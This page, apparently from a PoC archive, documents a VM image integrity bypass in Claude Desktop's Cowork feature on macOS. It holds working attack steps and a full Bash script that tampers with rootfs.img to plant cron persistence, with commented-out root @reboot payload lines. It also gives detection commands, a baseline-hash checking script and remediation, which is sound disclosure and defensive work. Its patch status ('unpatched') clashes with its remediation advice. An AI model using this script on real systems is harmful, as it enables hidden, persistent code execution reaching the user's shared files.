PoC Archive

Claude Desktop Cowork VM Image Integrity Bypass / Local Persistence (CVE-2026-7574)

by Ashraf Zaryouh / 0xBlackash (Recon 2026) · 2026-06-30

CVSS:              8.7/10
Severity:          High
CVE:               CVE-2026-7574
Category:          binary
Affected product:  Anthropic Claude Desktop — Cowork feature
Affected versions: v1.1348.0 through v1.2278.0 (macOS)
Disclosed:         2026-06-30
Patch status:      unpatched

Metadata

Field                 Value
Date Added            2026-06-30
Last Updated          2026-06-30
Author / Researcher   Ashraf Zaryouh / 0xBlackash (Recon 2026)
CVE / Advisory        CVE-2026-7574
Category              binary
Severity              High
CVSS Score            8.7 (CVSSv3.1; AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L)
Status                PoC
Tags                  LPE, persistence, VM-integrity, rootfs, Claude, AI-application, macOS, ext4, integrity-bypass, Shell
Related               N/A

Affected Target

Field                     Value
Software / System         Anthropic Claude Desktop — Cowork feature
Versions Affected         v1.1348.0 through v1.2278.0 (macOS)
Language / Platform       Bash (PoC); macOS (target)
Authentication Required   Yes (local unprivileged macOS user)
Network Access Required   No (local only)

Summary

CVE-2026-7574 is a VM image integrity bypass in Anthropic’s Claude Desktop Cowork feature (macOS). Before booting the Cowork virtual machine, the application validates only the presence of rootfs.img and its associated version marker (.rootfs.img.origin); it performs no cryptographic hash or signature verification on the image contents. A local attacker with standard macOS user privileges can extract the ext4 VM filesystem, inject arbitrary payloads (cron scripts, startup modifications, persistence mechanisms), repack the image, and place it back. On every subsequent Cowork launch the tampered image boots and executes attacker code inside the VM — including in host-mounted directories. The persistence survives application restarts and updates. Presented at Recon 2026.


Vulnerability Details

Root Cause

Claude Desktop Cowork stores its VM disk image at:

~/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img

Before launching the VM, the application checks:

  1. That rootfs.img exists.
  2. That the .rootfs.img.origin version marker is present.

No SHA-256 or other cryptographic hash is computed against the image contents. No code signature is verified. Any file that passes the existence check is trusted and booted.

The weakness maps to CWE-353 (Missing Support for Integrity Check).

Attack Steps

  1. Locate rootfs.img at ~/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img.
  2. Extract the ext4 partition:
    
    dd if=rootfs.img of=partition.img bs=512 skip=206848 count=20764639
    
  3. Mount the ext4 partition to a temporary directory:
    
    sudo mount -o loop partition.img /mnt/vm
    
  4. Inject a malicious payload (e.g., cron job, startup script, backdoor binary).
  5. Unmount and write the modified partition back into rootfs.img.
  6. Restart Claude Desktop Cowork; the tampered image boots.

Impact

  • Arbitrary code execution inside the Cowork VM on every launch.
  • Access to host-mounted directories shared with the VM (files, credentials, project data).
  • Persistence survives application restarts and Claude Desktop updates.
  • Invisible to standard file-integrity tools monitoring the application bundle.
  • Scope is Changed (S:C): VM compromise extends to host-mounted paths.

Environment / Lab Setup

OS:       macOS (any version running affected Claude Desktop Cowork)
Tools:    dd, mount, standard shell utilities
Privs:    Local unprivileged macOS user account

Proof of Concept

Run

git clone https://github.com/0xBlackash/CVE-2026-7574
cd CVE-2026-7574
bash CVE-2026-7574.sh

The PoC:

  1. Extracts the ext4 partition from rootfs.img.
  2. Mounts it and writes /etc/0xblackash-poc.txt and a cron-based persistence entry (/etc/cron.d/blackash-poc).
  3. Repacks the image.
  4. On next Cowork launch, /etc/0xblackash-poc.txt will contain a timestamped proof marker.

Verification

# Run inside the Cowork VM after the next launch
cat /etc/0xblackash-poc.txt

Detection & Indicators of Compromise

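# Inspect the size and modification time of the VM image
stat ~/Library/Application\ Support/Claude/vm_bundles/claudevm.bundle/rootfs.img

# Compute the image's SHA-256 for comparison against a known-good value
sha256sum ~/Library/Application\ Support/Claude/vm_bundles/claudevm.bundle/rootfs.img

# List bundle files modified more recently than the installed application
find ~/Library/Application\ Support/Claude/vm_bundles/ -newer /Applications/Claude.app -type f

# Watch Claude's log output for rootfs / vm_bundle activity
log stream --predicate 'process == "Claude"' --info | grep -i "rootfs\|vm_bundle"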
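
The SHA-256 comparison above only helps when there is a known-good value to compare against. The following is an added example, not code from the original advisory or from Anthropic: it contrasts the presence-only check described under Root Cause with a baseline hash check. The function names and the baseline file are assumptions, and the demo uses a constructed stand-in image.

```bash
#!/usr/bin/env bash
# Added example: compare rootfs.img against a recorded SHA-256 baseline.
# Function names and the baseline file are assumptions, not Claude Desktop behaviour.

# Portable SHA-256: sha256sum where available, else shasum -a 256 (stock macOS).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# The launch check as the page describes it: image and marker merely exist.
presence_check() {    # presence_check <bundle_dir>
    [ -f "$1/rootfs.img" ] && [ -f "$1/.rootfs.img.origin" ]
}

# Record a known-good digest right after a trusted install or update.
record_baseline() {   # record_baseline <bundle_dir> <baseline_file>
    hash_file "$1/rootfs.img" > "$2"
}

# Content check. Returns 0 = matches baseline, 1 = mismatch, 2 = cannot check.
verify_image() {      # verify_image <bundle_dir> <baseline_file>
    presence_check "$1" || return 2
    [ -s "$2" ] || return 2
    [ "$(hash_file "$1/rootfs.img")" = "$(cat "$2")" ]
}

# Constructed demo: a 64 KiB stand-in image changed in place, size unchanged.
demo() (
    d=$(mktemp -d) || exit 3
    dd if=/dev/zero of="$d/rootfs.img" bs=1024 count=64 2>/dev/null
    : > "$d/.rootfs.img.origin"
    record_baseline "$d" "$d/baseline.sha256"
    verify_image "$d" "$d/baseline.sha256" && before=0 || before=$?
    printf 'X' | dd of="$d/rootfs.img" bs=1 seek=4096 conv=notrunc 2>/dev/null
    presence_check "$d" && present=0 || present=$?
    verify_image "$d" "$d/baseline.sha256" && after=0 || after=$?
    rm -rf "$d"
    echo "before=$before presence=$present after=$after"
)

if [ "${1:-}" = "--demo" ]; then demo; fi
```

Keep the baseline file somewhere the desktop user cannot write (for example a root-owned path), since the tampering described on this page needs only that user's privileges.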

Remediation

Action    Detail
Patch     Upgrade Claude Desktop to v1.2279.0 or later (versions above v1.2278.0 unaffected)
Verify    After patching, validate that Anthropic implemented SHA-256 or codesigning on rootfs.img at launch time
Interim   Restrict file-system write access to ~/Library/Application Support/Claude/vm_bundles/ via macOS permissions

References

CVE-2026-7574.sh
#!/bin/bash
# CVE-2026-7574 PoC
# Author: Ashraf Zaryouh (@0xBlackash)
# GitHub: https://github.com/0xBlackash
# Target: Anthropic Claude Desktop Cowork VM (macOS)
# Date: June 2026
# Description: Demonstrates rootfs.img tampering leading to persistent code execution inside the VM

set -euo pipefail

echo "=== CVE-2026-7574 PoC - 0xBlackash ==="

IMG="$HOME/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img"
BACKUP="${IMG}.bak.$(date +%s)"
PARTITION="/tmp/rootfs.ext4"
MNT="/tmp/cve-7574-mnt"

if [ ! -f "$IMG" ]; then
    echo "❌ rootfs.img not found. Run Cowork mode in Claude Desktop first to download the bundle."
    exit 1
fi

echo "✅ Target image: $IMG ($(du -sh "$IMG" | awk '{print $1}'))"

# Backup (strongly recommended)
read -p "Create backup before modification? (y/N) " -n 1 -r
echo
if [[ $REPLY =~ ^[Yy]$ ]]; then
    echo "[+] Creating backup..."
    cp "$IMG" "$BACKUP"
    echo "   Backup: $BACKUP"
fi

# Extract ext4 partition (offsets based on public analysis - verify with gdisk/parted)
echo "[+] Extracting ext4 partition..."
dd if="$IMG" of="$PARTITION" bs=512 skip=206848 count=20764639 status=progress

# Mount and inject payload
echo "[+] Mounting filesystem..."
sudo mkdir -p "$MNT"
if sudo mount -o loop "$PARTITION" "$MNT" 2>/dev/null; then
    echo "   Mounted successfully"
    
    # Harmless canary for demonstration
    echo "0xBlackash was here - CVE-2026-7574 PoC | $(date)" | sudo tee "$MNT/etc/0xblackash-poc.txt" >/dev/null
    echo "   [+] Injected proof-of-concept canary"
    
    # Example: Persistent marker (harmless)
    echo "# 0xBlackash CVE-2026-7574" | sudo tee -a "$MNT/etc/cron.d/blackash-poc" >/dev/null
    
    # Optional: More advanced payload examples (commented)
    # sudo cp /path/to/payload.sh "$MNT/usr/local/bin/"
    # echo "@reboot root /usr/local/bin/payload.sh" | sudo tee "$MNT/etc/crontab"
    
    sudo umount "$MNT"
    echo "   Unmounted"
else
    echo "❌ Failed to mount. Use Linux environment with ext4 support (or install macFUSE + ext4 tools)."
    exit 1
fi

# Reinsert modified partition
echo "[+] Reinserting modified partition..."
dd if="$PARTITION" of="$IMG" bs=512 seek=206848 conv=notrunc status=progress

echo "✅ PoC completed successfully!"
echo ""
echo "Verification steps:"
echo "1. Launch Claude Desktop and start Cowork VM"
echo "2. Inside the VM, run: cat /etc/0xblackash-poc.txt"
echo "3. Changes persist across VM restarts (no re-download triggered)"
echo ""
echo "The VM boots normally because only file presence + .rootfs.img.origin marker is checked — no content integrity verification."

# Cleanup
rm -f "$PARTITION"
sudo rm -rf "$MNT"